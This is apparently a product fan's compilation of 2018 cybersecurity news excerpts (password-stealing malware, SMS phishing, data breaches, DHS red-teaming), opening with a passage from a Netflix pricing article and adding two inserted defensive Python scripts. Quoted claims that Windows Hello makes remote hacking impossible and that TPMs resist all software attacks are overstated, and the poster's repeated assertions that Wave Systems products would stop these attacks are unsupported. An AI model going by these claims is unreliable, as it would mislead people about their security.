And that, in turn, could drive an uptick in subscriptions among consumers borrowing someone else's login credentials. This could especially be a big deal in the U.S. -- both because of how common password-sharing has become here, and because high penetration rates have begun impacting its U.S. subscriber growth.
There are an estimated 126 million households in the U.S., and Netflix expects to end Q2 with 57.9 million U.S. streaming subscriptions. Exclude households that lack Internet access and/or can't afford Netflix, and the company's U.S. penetration rate is likely over 50% even before accounting for households using borrowed credentials. In addition, a December 2016 comScore survey found that 75% of U.S. Wi-Fi-connected homes subscribing to one or more over-the-top (OTT) streaming services included Netflix among them.
All of this makes it a good time for Netflix to try and coax U.S. password-borrowers to get their own subscriptions. Meanwhile, Netflix's very high customer satisfaction rates and still-reasonable pricing arguably position it well to convince households that need support for two or more simultaneous streams to keep their various Netflix-viewing members satisfied to sign up for a costlier plan.
Such upgrade activity would provide a fresh boost to Netflix's average selling price (ASP). With the help of the price hikes carried out last fall, Netflix's global ASP rose 14% annually in Q1, with 12% growth recorded in the U.S.
There is, of course, a risk that a broad rollout of Netflix's pricing overhaul in developed markets -- judging by how its latest price hike was rolled out, there's a good chance that Netflix will be more cautious in price-sensitive emerging markets -- would anger many consumers who have come to take their plan's support for two or four simultaneous streams for granted. However, with Netflix's plans remaining far cheaper than a typical pay-TV plan, and surveys indicating the company still has a fair amount of headroom to hike prices, the backlash might not be too severe.
Time will tell whether the pricing overhaul that Netflix is experimenting with in Europe becomes something more than a test. But either way, the fact that Netflix is even considering such a move speaks volumes about how confident the company remains about its pricing power and customer loyalty as Amazon.com, Disney and others take their best shots at the streaming video giant.
PIN vs Password in Windows 10 – Which offers better security?
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.thewindowsclub.com/pin-vs-password-in-windows-10
Windows 10 introduced Windows Hello, allowing users to sign in to their device using a PIN or biometric identification. It revolutionized the concept of system security, bringing it to a level that no system could be hacked remotely. However, Windows 10 also allows users to use the Password to log in. So which offers better security?
PIN vs Password in Windows 10
What is a Password?
A Password is a secret code which is stored on a server and can be used to access your account from any location, at least when speaking of computer-related accounts. Now they say that since servers have their own Firewalls which are powerful enough, these passwords cannot be hacked. However, this is untrue. A cyber-criminal doesn’t need to specifically access the server to figure out the password. Keylogging, phishing, etc. are a few of the known techniques to hack a person’s password without interfering with the server itself.
No matter how the password has been acquired, the intruder now has access to the user’s accounts from anywhere he/she chooses to access. One exception is if the user whose account was compromised was using a company based login where the information is stored in an active directory. In such a case, the hacker would have to access the original user’s account through any other system which is on the same network, which is difficult, though still possible.
Here’s where the concept of the PIN and biometric identification come to use. Windows Hello PIN and biometric identification are system specific. They are not stored on any server. While these logon types are not a substitute for a password, they are seemingly unhackable unless the cyber-criminal steals the device itself.
What is a PIN?
A PIN is an easy secret login code to log in to your device. It is usually a set of numbers (mostly 4 digits), though some companies might allow their employees to use PINs with letters and special characters.
A PIN is tied to the device
A PIN is not stored on any server and is device specific. This means that if someone finds out your system’s PIN, the intruder would be able to get nothing out of it unless he/she steals the device as well. The PIN cannot be used on any other device belonging to the same person.
A PIN is backed up by TPM hardware
A Trusted Platform Module (TPM) is a hardware chip that has special security mechanisms to make it tamper proof. It has been made such that no known software attacks can hack it, e.g. a PIN brute force won’t work since the TPM gets locked.
How does a PIN backed by the TPM work if someone steals your laptop?
Ideally, it would be an extremely rare case that a cybercriminal is able to steal your laptop and spoof its PIN, but well, considering that it’s possible, the TPM uses an anti-hammering mechanism to block the PIN after repeated wrong attempts. If your device does not have a TPM, you can use BitLocker to limit the number of failed sign-in attempts, using the Group Policy Editor.
Why do users need to set a PIN before using biometric identification?
Be it a fingerprint, the retina of the eye or speech, injury on the body part used for biometric identification might lead to your device getting locked. Since people have a habit of not setting PINs unless forced to, Microsoft made it mandatory to set one before creating biometric identification.
Which is better among PIN and Password?
Honestly, this is a question that cannot be answered straight away. A PIN cannot be used for single sign-on structures like a password. A password is insecure and even known attacks like phishing and keylogging cannot protect systems if the password is hacked. Usually, servers offer extra protection like 2-step authentication and IT departments in companies help change the password or block accounts the second they figure out that the password has been compromised. So the choice is yours – but generally speaking, a PIN does offer more security.
This password-stealing malware just added a new way to infect your PC
See Wave VSC 2.0 at wavesys.com for a product that could help this situation in a BIG WAY. imo. Wave Endpoint Monitor (see wavesys.com as well) could also have a positive impact on this situation.
https://www.zdnet.com/article/this-password-stealing-malware-just-added-a-new-way-to-infect-your-pc/
One of the new tactics by the malware involves an injection technique not seen in the wild until just days ago
A powerful form of malware which can be used to distribute threats including Trojans, ransomware and malicious cryptocurrency mining software has been updated with a new technique which has rarely been seen in the wild.
Distributed in spam email phishing campaigns, Smoke Loader has been sporadically active since 2011 but has continually evolved. The malware has been particularly busy throughout 2018, with campaigns including the distribution of Smoke Loader via fake patches for the Meltdown and Spectre vulnerabilities which emerged earlier this year.
Like many malware campaigns, the initial attack is conducted via a malicious Microsoft Word attachment which tricks users into allowing macros, enabling Smoke Loader to be installed on the compromised system and allowing the Trojan to deliver additional malicious software.
Researchers at Cisco Talos have been tracking Smoke Loader for some time and have seen its latest campaigns in action. One of the current preferred payloads is TrickBot -- a banking Trojan designed to steal credentials, passwords and other sensitive information. Phishing emails distributing the malware are designed to look like invoice requests from a software firm.
What intrigued researchers is how Smoke Loader is now using an injection technique which hadn't been used to distribute malware until just days ago. The code injection technique is known as PROPagate and was first described as a potential means of compromise late last year.
This technique abuses the SetWindowsSubclass function -- a process used to install or update subclass windows running on the system -- and can be used to modify the properties of windows running in the same session. This can be used to inject code and drop files while also hiding the fact it has happened, making it a useful, stealthy attack.
It's likely that the attackers have observed publicly available posts on PROPagate in order to recreate the technique for their own malicious ends.
Those behind this process have also added anti-analysis techniques to complicate forensics, runtime AV scanners, tracing, and debugging that any researchers may attempt to conduct on the malware.
While there are still plenty of Smoke Loader attacks which look to deliver additional malware to compromised systems, in some cases the malware is being equipped with its own plug-ins to go straight onto performing its own malicious tasks.
Each of these plugins is designed to steal sensitive information, specifically stored credentials or sensitive information transferred over a browser -- the likes of Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird can all be used to steal data.
The malware can even be injected into applications like TeamViewer, potentially putting the credentials of others on the same network as the infected machine at risk too.
It's possible that Smoke Loader has been equipped with these tasks because its operators aren't currently getting much business in response to adverts on dark web forums advertising their ability to install other types of malware onto their compromised network of machines. It could also just be a means of taking advantage of the botnet for their own purposes.
Either way, it indicates that organisations must remain vigilant against potential threats.
"We have seen that the trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date," wrote Cisco Talos researchers.
"We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third parties, and ensuring that a robust offline backup solution is in place. These practices will help reduce the threat of a compromise, and should aid in the recovery of any such attack," they added.
UK CEOs believe cyber attacks are inevitable
A better, cost effective and unique set of cybersecurity products could prevent these cyber attacks from happening: see wavesys.com imo.
http://www.itpro.co.uk/security/31431/uk-ceos-believe-cyber-attacks-are-inevitable
KPMG survey finds that four in ten UK company bosses believe they will be targeted by cyber criminals
Four in ten UK CEOs believe it's no longer a case of "if" a cyber attack will happen as it is now an inevitability, according to research from KPMG.
The professional services firm surveyed 150 UK leaders and a further 1,150 CEOs from around the world about their future investment plans and the challenges facing their companies.
The results showed that 39% of UK CEOs believed that they will be targeted by a cyber attack. The percentage was higher globally, with almost half of international CEOs feeling the same way.
Bernard Brown, vice chair at KPMG in the UK, said that the findings show how high up the agenda cybersecurity has become for businesses.
"The seeming inevitability of a cyber attack crosses all borders and has now crossed firmly over the threshold for the board-level discussions," he said.
"Protecting the business from a cyber attack has jumped further up the boardroom agenda and we are seeing businesses making their defences the best they can be."
The survey found that UK business leaders believe that a strong cybersecurity strategy is critical to engendering trust with key stakeholders, with 74% agreeing that cybersecurity is an enabler of trust, compared to 55% of global CEOs.
According to the report, cyber awareness amongst UK leaders is changing, with 39% believing that their organisations are either "very well" or "well" prepared for a future cyber attack.
CEOs also believe that cybersecurity specialists are an effective part of the business with 45% of UK CEOs seeing their value, coming second to data scientists who are seen as being effective by 62% of the CEOs asked.
"It's encouraging to see that CEOs are developing a more mature understanding of what cyber security actually means. They are beginning to ask more awkward and searching questions of their IT teams. What are the challenges that face us specifically, what risks are we carrying, what do we need to be resilient to a cyber-attack?" Brown added.
"Organisations are spending more time planning for worst case scenarios, running simulations and thinking in detail about how they would deal with the uncertainties that arise during a cyber breach."
More and more companies are becoming victims of cybercrime. In recent weeks, sports brand and trainer maker Adidas suffered a data breach that could have potentially exposed the personal details of millions of its customers.
‘Couldn’t recognize that fingerprint’ Windows Hello error
There seem to be a lot of time-consuming workarounds for the Windows Hello fingerprint reader technology. Seems like Wave VSC 2.0 would have had kinks like these already worked out. Windows Hello and Wave VSC 2.0 are somewhat similar technologies.
Full article at the link.
https://windowsreport.com/fix-couldnt-recognize-fingerprint/
Excerpts:
With the introduction of Windows Hello, Microsoft added a few extra security layers with a few versatile biometric options. The fingerprint scanner is commonly used, and it’s held in high regards when it comes to its security value (look at all those smartphones). Once established, you’ll be able to go past the lock screen with just a touch. However, it seems that the fingerprint recognition failed for some users and they were acquainted with the “Couldn’t recognize that fingerprint” error.
And it hardly works with the same success with other OEMs. Thus, Microsoft Hello and the accompanying sign-in options display lots of bugs on Lenovo and Dell laptops. And, for that reason, you’ll probably need to re-establish the fingerprint sign-in profile more times than you would like.
2: Use Local account and update Windows
The same reason. If Windows 10 update broke your fingerprint reader and it gives you the “Couldn’t recognize that fingerprint” error, you might look for alternatives. Lots of affected users managed to address the problem but, in exchange, they were able to use the fingerprint only on Local account instead of the Microsoft account.
4. Follow the instructions.
With that, we can conclude this article. We can only hope that these steps helped you resolve the “Couldn’t recognize that fingerprint” error in Windows Hello sign-in. If there is some additional information you consider useful, feel free to share it with us. The comments section is just below.
Two-Factor Inauthentication – The Rise In SMS Phishing Attacks
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/sites/wave/files/Wave%20Systems_Smart%20Card%202.0.pdf
https://www.informationsecuritybuzz.com/articles/two-factor-inauthentication-the-rise-in-sms-phishing-attacks/
There are countless ways to carry out a cyber attack, but for the vast majority the key is deception – typically involving identity deception in which the attacker poses as a trusted party to the intended victim.
With cyber criminals constantly on the prowl to capture passwords and other credentials, two-factor authentication (2FA) has become one of the most widely accepted backup verifications for many services and companies. While various 2FA methods are available, the humble SMS text message has emerged as a favourite as it is incredibly ubiquitous and easy to understand.
Nevertheless, SMS also contains a number of inherent flaws as a security verification method. The first problem is that 2FA doesn’t actually verify the user’s identity, only that they have access. This means that anyone with direct access to the device can pass through 2FA security measures as they can send themselves the code.
The SMS phishing menace
Thieves and fraudsters don’t need to have the device in their hands, as 2FA is also vulnerable to remote phishing. We most often think of phishing attacks as taking place over email, targeting information such as passwords, but the same tactic can very easily be applied over SMS and targeting reset codes. One particularly powerful technique is the Verification Code Forwarding Attack, or VCFA. For this approach, the criminal accesses a service provider and requests an SMS code to reset their password for a particular user. Immediately afterwards, they send a fake text message to the same user, pretending to be the service provider and asking for the code “as an additional verification measure”.
In a research experiment I conducted with colleagues at New York University, we discovered that the VCFA technique can be incredibly effective – far more so than comparable email-based phishing attacks. We enlisted more than 300 volunteers who were not aware that the experiment involved SMS phishing, and sent them a variety of different messages designed after real SMS from their email provider. The most successful message was able to fool 50 percent of recipients into giving up their authentication code, which is an impossibly high result for most forms of social engineering. By comparison, most non-targeted email-based phishing attacks have a success rate of around 1 per cent, with the very best reaching two or three percent.
Any service being breached in this way would mean severe repercussions for the victim, most obviously online payment, retail, and anything else connected to financial data. The holy grail for any attacker is to gain access to an email account, a tactic known as Email Account Compromise (EAC). While financial details can be exploited as a one-off opportunity before the bank takes action, an email account can be used in much more subtle and insidious ways.
EAC emails are far more difficult to detect than normal fraudulent messages, as they lack potential tells such as mismatched sender IDs. The good news is that they are not entirely unstoppable, and it is possible to detect and prevent an EAC email by looking even deeper into different elements associated with the identity of the legitimate user. For example, an email security system could be set up to detect details about the user agent – the device used to send the email. So, a user could normally use a Mac with a 2560 × 1600 screen resolution, while the imposter who has hijacked their account might use a PC with a 1440 × 900 resolution.
This difference can be identified through the email itself, along with other signs such as the IP address. Taken together, these clues can point to a suspicious email even when the account address is genuine. The email can then be flagged for further examination to determine if there really is a malicious actor at work, or if the CEO happens to be using his or her spouse’s PC for the afternoon.
Can 2FA be saved?
The most obvious solution to the many security flaws in SMS 2FA is to abandon the text message as a verification measure – something I expect to see happening with increasing frequency over the next year.
Although SMS 2FA is certainly on the way out, it will be some time before the change filters through all organisations thanks to its simplicity and popularity. While SMS remains so widespread and more attackers pick up on SMS phishing attacks, it is more important than ever for organisations to be aware that their workforce’s digital identities may be compromised. Enterprises must be prepared for the threat of an employee’s email being hijacked via 2FA and used to attack them from within.
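The EAC check the article sketches (compare the device and network a message comes from with what the mailbox owner normally uses) can be run over the message headers themselves. The following is an added example, not code from the article or its author: it builds a per-sender baseline of mailer and source network, pulls the submitting client's IP from the Received chain and the mailer from X-Mailer/User-Agent, and reports every mismatch for review. The baseline profile and both sample messages are constructed for illustration; the article's screen-resolution signal is omitted because it is not carried in standard mail headers.

```python
"""Flag messages whose sending device or network departs from the mailbox owner's baseline.

Added example, not code from the article. It implements the Email Account Compromise
(EAC) check described above: compare the mailer (user agent) and originating IP seen on
a message with what the legitimate user normally uses, and flag mismatches for review.
The baseline profile and both sample messages are constructed for illustration.
"""
import email.utils
import ipaddress
import re
from dataclasses import dataclass, field
from email import message_from_string
from email.message import Message

@dataclass
class SenderProfile:
    mailers: set = field(default_factory=set)      # X-Mailer / User-Agent values seen before
    networks: list = field(default_factory=list)   # networks the user normally sends from

# Constructed baseline: the CEO always sends from Apple Mail via the corporate egress range.
BASELINES = {
    "ceo@example.com": SenderProfile(
        mailers={"Apple Mail (2.3445.104.11)"},
        networks=[ipaddress.ip_network("198.51.100.0/24")],
    ),
}

_BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def originating_ip(msg: Message):
    """Client IP from the earliest hop. Relays prepend Received headers, so the last
    one listed is the first hop, i.e. the submitting client."""
    for hop in reversed(msg.get_all("Received") or []):
        match = _BRACKETED_IPV4.search(hop)
        if match:
            return ipaddress.ip_address(match.group(1))
    return None

def score_message(raw: str):
    """Return (sender, reasons). An empty reasons list means the message matches the baseline."""
    msg = message_from_string(raw)
    sender = email.utils.parseaddr(msg.get("From", ""))[1].lower()
    profile = BASELINES.get(sender)
    if profile is None:
        return sender, ["no baseline for sender"]

    reasons = []
    mailer = msg.get("X-Mailer") or msg.get("User-Agent")
    if mailer and mailer not in profile.mailers:
        reasons.append(f"unfamiliar mailer: {mailer}")

    ip = originating_ip(msg)
    if ip is None:
        reasons.append("no client IP found in Received headers")
    elif not any(ip in net for net in profile.networks):
        reasons.append(f"unfamiliar source IP: {ip}")
    return sender, reasons

# Constructed sample: the owner's usual device and network.
NORMAL = """\
Received: from [198.51.100.25] by mail.example.com with ESMTPSA
From: CEO <ceo@example.com>
To: cfo@example.com
Subject: Q3 numbers
X-Mailer: Apple Mail (2.3445.104.11)

Attached.
"""

# Constructed sample: the genuine From address, but a different mailer and an outside IP.
SUSPECT = """\
Received: from mail.example.com ([198.51.100.25]) by mx.partner.example
Received: from [203.0.113.77] by mail.example.com with ESMTPSA
From: CEO <ceo@example.com>
To: cfo@example.com
Subject: Urgent wire transfer
X-Mailer: Microsoft Outlook 16.0

Please process the attached wire today.
"""

if __name__ == "__main__":
    for name, raw in (("NORMAL", NORMAL), ("SUSPECT", SUSPECT)):
        sender, reasons = score_message(raw)
        print(name, sender, reasons or "matches baseline")
```

A flag here is a reason to look, not a verdict: as the article notes, the owner may simply be on a different machine for the afternoon, so the output belongs in an analyst queue rather than a block rule.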
Can Congress salvage a broken cyber strategy?
https://www.wavesys.com/solutions
Excerpt: Much of the complexity, stress, and expense of data protection stems from hanging on to a failed, 20th-century approach to the problem. Namely, piling on layers of software in an attempt to keep the bad guys and their viruses out. But there is no “in” to keep them out of anymore. Consider today’s increasingly mobile workforce, the proliferation of personal devices, and the growing use of web applications—all of which cyber criminals have learned to take advantage of.
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.fifthdomain.com/congress/capitol-hill/2018/06/28/can-congress-salvage-a-broken-cyber-strategy/ If the government 'really' knew about Wave, articles like the one below would be a lot more positive in their cybersecurity message. imo.
A cyberspace ambassador. An exchange program between government and private security experts. A cyber blue-ribbon commission based on nuclear age strategy.
These are among the scattershot of proposals that Congress has considered this week as lawmakers attempt to articulate a national cybersecurity strategy in the face of continued digital hostility from Russia and China.
Amid a barrage of recent criticism leveled at both the Trump and Obama administrations for a cybersecurity policy that is either entirely absent or timid, the proposed legislation is sending a message: America needs a plan. Yet in comparison to the crisp Chinese five-year plans and Russian digital assaults, the cyber plan forged by Congress appears increasingly scattershot to analysts.
“States like China and Israel have comprehensive national strategies for the cyber domain that integrate national security and economic concerns,” said Bobby Chesney, a professor at the University of Texas at Austin.
“The United States has not been nearly so strategic under either Obama or Trump, and now many Senators are doing what they can to try to force smarter strategic thinking.”
In recent negotiations with China, experts say that Trump has been willing to trade away the cybersecurity of American citizens for a friendlier business climate. And in May, the White House eliminated the position of cybersecurity coordinator. Only 13 percent of security experts believe that Congress and the White House understand the cyberthreat, according to a recent survey by the firm Black Hat.
Chesney said several provisions aim to force the administration to take a tough line in response to malicious Russian cyber activity, but he added it is hard to force action. On the other hand, Chesney supported the proposed bipartisan “Cyber Solarium Commission,” which would examine the nation’s cyber strategy.
The commission hopes to strengthen America’s cybersecurity through sociology techniques that were used during the Eisenhower administration.
Congressional staff are working this week to reconcile the defense spending bill that contains the tough language and the commission, but it is just one out of several proposals that are creating a blurred digital road-map.
A new plan for how the U.S. government should respond to state-sponsored cyberattacks was also approved in the House Foreign Affairs Committee June 28. It came one week after former President Obama’s top cyber official confirmed a report that he was ordered to “stand down” in the face of Russian digital aggression. The proposal from Rep. Ted Yoho, R-Fla., now faces a full House and Senate vote.
And amid a hollowed out State Department, a Senate committee approved the creation of a new chief cybersecurity diplomat June 26. It is a direct rebuttal of former Secretary of State Rex Tillerson, who scrapped a previous office that coordinated digital issues.
Speaking at George Washington University June 28, the president of FireEye, Kevin Mandia, laid out the challenges for protecting America’s digital infrastructure. Most of the U.S. critical infrastructure is in the private sector, according to Mandia, as opposed to other countries who have nationalized the systems that underlie their society.
“We are in a $10 million glass house and North Korea is in a mud hut with seven IP addresses,” said Mandia.
340 Million Records Exposed in Exactis Breach
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt: When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
https://www.infosecurity-magazine.com/news/340-million-records-exposed-in/?utm_source=dlvr.it&utm_medium=twitter
Another major data breach has left roughly 340 million records exposed by data aggregation firm Exactis after information was left on a publicly accessible server. The 2 terabytes' worth of data appears to include the personal details of the individuals listed, including phone numbers, home addresses, email addresses and other highly personal characteristics for every name.
The type of personal information that was potentially compromised should be concerning to consumers, given the enormous volume of information that is collected, spliced together and housed in databases such as the one that was leaked by Exactis, said Anurag Kahol, Bitglass CTO.
“Exposing that amount of data to the public internet is a significant offense by the organization and one that we’ve seen dozens of times in the past year, yet it is unlikely that we’ll see anything change unless organizations take the initiative in protecting corporate data,” Kahol said.
News of the breach raises questions about whether Exactis knew what type of information it had and whether it considered the potential implications if that information were compromised. “The problem with most enterprises today,” said Ruchika Mishra, Balbix director of products and solutions, “is that they don’t have the foresight and visibility into the hundreds of attack vectors – be it misconfigurations, employees at risk of being phished, admin using credentials across personal and business accounts – that could be exploited.”
It could be months before the real impact of the breach can be measured, but what has initially been reported is alarming and there would not be any surprise if Exactis confirmed that 340 million individuals were indeed impacted.
“The Exactis data leak should enrage consumers and businesses alike. The sheer amount of cloud databases left accessible on the Internet is astounding, especially when one considers the type and amount of data that users store on it without giving it second thought,” said John “Lex” Robinson, cybersecurity strategist at Cofense.
“It is worth noting that just because the server was left open to the public does not mean it was stolen by malicious hackers, but we cannot be certain. The data reported to have been leaked is incredibly comprehensive and can be used by hackers to develop more targeted phishing scams.”
Do employees open your network to the bad guys by using hacked passwords?
A better way for companies and governments to avoid bad password harm than what is suggested in this article imo, see:
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt: The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://blog.knowbe4.com/do-employees-open-your-network-to-the-bad-guys-by-using-hacked-passwords
A whopping 25% of employees are using the same password for all logins. What if that password is available on the dark web? A massive amount of passwords are compromised due to data breaches and used by the bad guys for attacks. Are any hacked passwords in use within your organization?
Using breached passwords puts your network at risk. Password policies often do not prevent employees using known bad passwords. Making your users frequently change their passwords isn’t a good solution either. It only takes one compromised password match for the bad guys to gain access.
KnowBe4’s complimentary NEW Breached Password Test (BPT) checks to see if your users are currently using passwords that are in publicly available breaches associated with your domain. BPT checks against your Active Directory and reports compromised passwords in use right now so that you can take action immediately!
Here’s how Breached Password Test works:
• Checks to see if your company domains have been part of a data breach that included passwords
• Checks to see if any of those breached passwords are currently in use in your Active Directory
• Does not show/report on the actual passwords of accounts
• Just download the install and run it
• Results in a few minutes!
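The check described above (find accounts whose current password appears in a public breach, without ever showing the password) is straightforward to model. The following is an added example, not KnowBe4's code: it hashes the directory's passwords, queries the breach corpus by a short hash prefix (the k-anonymity range scheme public breached-password services use, so the full hash never leaves the organisation), compares only the suffix, and reports account names and reuse groups rather than passwords. The breach corpus and the directory export are constructed; a real tool would read Active Directory, which stores NT hashes rather than SHA-1, a simplification made here.

```python
"""Report which directory accounts use a password found in a breach corpus, without
handling or reporting the passwords themselves.

Added example, not KnowBe4's code. Both the breach corpus and the directory export
are constructed. Active Directory stores NT hashes rather than SHA-1; SHA-1 is used
here as a simplification.
"""
import hashlib
from collections import defaultdict

PREFIX_LEN = 5   # prefix length used by public breached-password range services

def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()

# Constructed breach corpus: uppercase SHA-1 digests of leaked passwords.
BREACH_CORPUS = {sha1_hex(p) for p in ("Password1", "Summer2018!", "letmein", "qwerty123")}

# Constructed directory export: account -> SHA-1 of its current password. The plaintext
# appears only to build the sample; the check itself never touches plaintext.
DIRECTORY = {
    "alice": sha1_hex("Summer2018!"),
    "bob": sha1_hex("c0rrect-h0rse-battery"),
    "carol": sha1_hex("Password1"),
    "dave": sha1_hex("Password1"),
    "svc_backup": sha1_hex("letmein"),
}

def range_lookup(prefix: str) -> set:
    """Suffixes of every corpus digest starting with `prefix`: the k-anonymity range query.
    Only the short prefix is sent to the corpus; the full digest stays local."""
    return {h[PREFIX_LEN:] for h in BREACH_CORPUS if h.startswith(prefix)}

def breached_accounts(directory: dict) -> list:
    """Accounts whose current password digest appears in the breach corpus."""
    by_prefix = defaultdict(list)
    for account, digest in directory.items():
        by_prefix[digest[:PREFIX_LEN]].append((account, digest[PREFIX_LEN:]))
    hits = []
    for prefix, members in by_prefix.items():
        leaked = range_lookup(prefix)          # one range query per distinct prefix
        hits.extend(account for account, suffix in members if suffix in leaked)
    return sorted(hits)

def reuse_groups(directory: dict) -> list:
    """Groups of accounts sharing one password: a single compromised match opens all of them."""
    groups = defaultdict(list)
    for account, digest in directory.items():
        groups[digest].append(account)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)

if __name__ == "__main__":
    print("accounts using breached passwords:", breached_accounts(DIRECTORY))
    print("accounts sharing a password:", reuse_groups(DIRECTORY))
```

The report lists only account names, which is the property the article's "does not show/report on the actual passwords" point asks for; the reuse groups matter because the one-in-four users who reuse a password turn a single breached credential into several compromised accounts.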
Meet MyloBot malware turning Windows devices into Botnet
For a strong possible solution to this see:
https://www.wavesys.com/malware-protection
Good quote at the link, 'Among other things, you'll know immediately whether any one of your devices - computers, laptops, tablets, smartphones- has been tampered with.'
https://www.hackread.com/meet-mylobot-malware-turning-windows-devices-into-botnet/
The IT security researchers at deep learning cybersecurity firm Deep Instinct have discovered a sophisticated malware in the wild targeting Microsoft’s Windows-based computers.
Adding devices to Botnet
The malware works in such a way that upon infecting, it allows hackers to take over the device and make it part of a botnet to carry out different malicious activities including conducting Distributed Denial of Service (DDoS) attacks, spreading malware or infecting the system with ransomware etc.
A Botnet is a network of private computers infected with malicious software and controlled as a group without the owners’ knowledge, e.g., to send spam messages.
Apart from these, the malware not only steals user data, it also disables the anti-virus program and removes other malware installed on the system. Dubbed MyloBot by Deep Instinct; based on its capabilities and sophistication, researchers believe that they have “never seen” such a malware before.
Furthermore, once installed, MyloBot starts disabling key features on the system including Windows Updates, Windows Defender, blocking ports in Windows Firewall, deleting applications and other malware on the system.
“This can result in loss of the tremendous amount of data, the need to shut down computers for recovery purposes, which can lead to disasters in enterprises. The fact that the botnet behaves as a gate for additional payloads, puts the enterprise in risk for the leak of sensitive data as well, following the risk of keyloggers/banking trojans installations,” researchers warned.
Dark Web connection
Further digging into the MyloBot sample reveals that the campaign is being operated from the dark web while its command and control (C&C) system is also part of other malicious campaigns.
Although it is unclear how MyloBot is being spread, researchers discovered the malware on one of their clients’ system sitting idle for 14 days which is one of its delaying mechanisms before accessing its command and control servers.
It is not surprising that Windows users are being targeted with MyloBot. Last week, another malware called Zacinlo was caught infecting Windows 10, Windows 7 and Windows 8 PCs. Therefore, if you are a Windows user watch out for both threats, keep your system updated, run a full anti-virus scan, refrain from visiting malicious sites and do not download files from unknown emails.
Deep Instinct is yet to publish a research paper covering MyloBot from end to end.
FIs Facing $100B A Year In Cyberattack Losses
How about using excellent cybersecurity tools to all but nullify the risk of attack? wavesys.com....
https://www.pymnts.com/news/security-and-risk/2018/imf-financial-institutions-cyberattack-losses/
The impact from a cyberattack on financial institutions (FIs) could reach as high as a few hundred billion dollars annually, chipping away at profits and threatening the stability of financial firms, the International Monetary Fund (IMF) warned in a new report.
According to an IMF staff modeling exercise, the IMF found that FIs could lose that much each year because they are a target of hackers, and due to the role they play in managing and handling funds. The IMF report said a successful hack of an FI could spread quickly through the interconnected financial system. What’s more, the IMF said that lots of FIs use older systems that may not be able to fight off a cyberattack. That attack could result in financial losses, as well as a hit to the FIs’ reputation, which could lead to more losses.
To ascertain the risk, the IMF used techniques from actuarial science and operational risk measurement to come up with total losses from cyberattacks. Taken “at face value,” the IMF said the study suggests the average annual potential losses from cyberattacks could be nearly 9 percent of banks’ net income globally, or around $100 billion. In a severe scenario where cyberattacks are frequent, the hit would be two-and-a-half to three-and-a-half times as high, or between $270 billion and $350 billion. In the worst 5 percent of cases, the average potential loss could be as high as half of a bank’s net income, which would place the entire financial sector at risk.
In addition, the IMF noted that the estimated losses are much bigger than the cyber insurance market, with premiums remaining small globally at around $3 billion as of last year, and most FIs not carrying cyber insurance. When they do, they get limited coverage with insurers, having a tough time evaluating the risk of cyberattack exposure, noted the IMF. The IMF said there is a way to improve the risks, pointing to governments collecting more “granular, consistent and complete data on the frequency and impact of cyberattacks.” The IMF said that would help assess risk for the financial sector.
The IMF wrote in the report, “Requirements to report breaches — such as considered under the EU’s General Data Protection Regulation [GDPR] — should improve knowledge of cyberattacks. Scenario analysis could be used to develop a comprehensive assessment of how cyberattacks could spread and design adequate responses by private institutions and governments.”
New fears over Chinese espionage grip Washington
http://thehill.com/policy/cybersecurity/393741-new-fears-over-chinese-espionage-grip-washington
=============================================================
Red-teaming by DHS 'quietly and slowly' uncovers agency vulnerabilities
The testing scenario in the second article would be stopped with Wave's products as explained on the website (partially under The Wave alternative). imo.
https://www.cyberscoop.com/red-teaming-dhs-quietly-slowly-uncovers-agency-vulnerabilities/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=73447112&utm_medium=social&utm_source=twitter
The Department of Homeland Security has carried out quiet “red-teaming” exercises at three federal agencies, breaking into networks and telling agency officials how it was done. The goal is for officials to more quickly realize when a hacker has a foothold in their systems to keep them from exfiltrating data.
“We go really quietly and slowly, just like an adversary would,” Rob Karas, the DHS official leading the red-team exercises, said Wednesday at the Cybersecurity Leadership Forum presented by Forcepoint and produced by CyberScoop and FedScoop.
Karas said his team has carried out five such red-team drills at three agencies, declining to name them. The 90-day assessments begin with about two weeks of reconnaissance that might culminate in a carefully crafted spearphishing email.
“We send a phishing email and it beacons back to our host in Arlington, and then we have a foothold” into the organization, said Karas, DHS’s director of national cybersecurity assessments and technical services. “From there, we pivot to other computers, to domain controllers, to enterprise computers.”
His team of security testers litters the target network with signatures representing ransomware or other malware — no actual malicious code is used. They check to see if the agency’s security operations center (SOC) detects malicious scans of the network and how it responds. The ethical hackers also attempt to exfiltrate large volumes of data over various channels.
Cybersecurity experts say rigorous red-team exercises are key to giving an organization a clear understanding of its vulnerabilities. A recent Office of Management and Budget report suggests many agencies still lack that clear understanding. Just 27 percent of agencies say they can detect and investigate “attempts to access large volumes of data,” and even fewer agencies test that capability annually, according to the report.
One of the more infamous cases of an undetected data heist at an agency was the 2015 hack of the Office of Personnel Management. Hackers sat unnoticed on the agency’s network for months and made off with the personal data of 22 million current and former federal workers.
Karas is trying to keep that from happening again.
